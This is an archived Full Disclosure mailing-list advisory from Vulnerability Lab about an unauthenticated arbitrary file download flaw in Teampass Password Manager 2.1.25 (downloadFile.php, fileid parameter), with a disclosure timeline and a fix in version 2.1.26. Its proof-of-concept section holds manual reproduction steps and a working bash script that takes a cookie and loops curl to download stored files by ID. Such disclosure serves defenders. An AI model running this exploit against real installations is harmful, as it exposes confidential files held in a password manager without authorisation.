[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Teampass v2.1.25 - Arbitrary File Download Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2016-05-25 8:47:25
Message-ID: 0139532f-b49a-eb7c-7b9b-760abbf47069 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Teampass v2.1.25 - Arbitrary File Download Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1843
Release Date:
=============
2016-05-17
Vulnerability Laboratory ID (VL-ID):
====================================
1843
Common Vulnerability Scoring System:
====================================
8.1
Product & Service Introduction:
===============================
TeamPass is a Passwords Manager dedicated for managing passwords in a collaborative way on any \
server Apache, MySQL and PHP. It is especially designed to provide passwords access security \
for allowed people. This makes TeamPass really useful in a Business/Enterprise environment and \
will provide to IT or Team Manager a powerful and easy tool for customizing passwords access \
depending on the user's role.
(Copy of the Homepage: http://teampass.net/ )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered an arbitrary file download \
vulnerability in the Teampass Password Manager v2.1.25 web-application.
Vulnerability Disclosure Timeline:
==================================
2016-05-11: Researcher Notification & Coordination (Peter Kok)
2016-05:12 Vendor Notification (Teampass Security Team)
2016-05-13: Vendor Response/Feedback (Teampass Security Team)
2016-05-15: Vendor Fix/Patch (Teampass Developer Team)
2016-05-17: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Nils Laumaillé
Product: Teampass Password Manager - Online Service (Web-Application) 2.1.25
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
An arbitrary file download web vulnerability has been discovered in the Teampass Password \
Manager v2.1.25 web-application. The arbitrary file download vulnerability allows remote \
attackers to unauthorized download files via GET method request.
The web vulnerability is located in the `downloadFile.php` file. Remote attackers are able to \
download internal uploaded files without any authentication. The web vulnerability can be \
exploited by remote attackers without user interaction. The issue is located on the \
application-side of the web-application and the request method to access is GET.
The security risk of the vulnerability is estimated as high with a cvss (common vulnerability \
scoring system) count of 8.1. Exploitation of the arbitrary file download vulnerability \
requires no user interaction or privileged web-application user account. Successful \
exploitation of the arbitrary file download web vulnerability results in unauthorized file \
access and information disclosure.
Request Method(s):
[+] GET
Vulnerable File(s):
[+] downloadFile.php
Vulnerable Parameter(s):
[+] fileid
Proof of Concept (PoC):
=======================
The arbitrary file download web vulnerability can be exploited by remote attackers without \
privileged web-application user account or user interaction. For security demonstration or to \
reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reprodcue the vulnerability ...
1. Open a browser and visit https://your.teampass.installation/sources/downloadFile.php which \
will display the message "Hacking attempt..." 2. Get a cookie by visiting the login page \
https://your.teampass.installation/, you don't have to authenticate only visit this page 3. \
Again visit https://your.teampass.installation/sources/downloadFile.php, now that the cookie is \
set there is no "Hacking attempt..." message
Files which are attached to items created in teampass can now be downloaded with the url \
https://your.teampass.installation/sources/downloadFile.php?name=lol&pathIsFiles=0&fileid=1 \
Just change the fileid in the url to download different stored files
PoC: Exploit
#!/bin/bash
COOKIE=/tmp/teampass.cookie
if [ ! "$1" ]
then
echo "Usage: $0 [url]"
exit 0
fi
#Get a valid cookie
curl -c $COOKIE -s "$1" >/dev/null
#get stored files with fileid 1 through 100
for i in $(seq 1 100)
do
curl -b $COOKIE "$1/sources/downloadFile.php?name=lol&pathIsFiles=0&fileid=$i" -s -o \
file-$i if [ -s "file-$i" ]
then
#display the filetype
file file-$i
else
#remove file if empty
rm -f file-$i
fi
done
rm -f $COOKIE
exit 0
Solution - Fix & Patch:
=======================
The arbitrary file download vulnerability can be patched by denying access to the \
`downloadFile.php` without authentication.
Note: The manufacturer fixed the vulnerability and an update is available for download in \
version 2.1.26.
URL: http://teampass.net/2016-05-13-release-2.1.26
Security Risk:
==============
The security risk of the arbitrary file download web vulnerability in the Teampass Password \
Manager web-application is estimated as high. (CVSS 8.1)
Credits & Authors:
==================
Peter Kok - [http://www.vulnerability-lab.com/show.php?user=Peter%20Kok]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any licenses, \
policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list, modify, use or \
edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic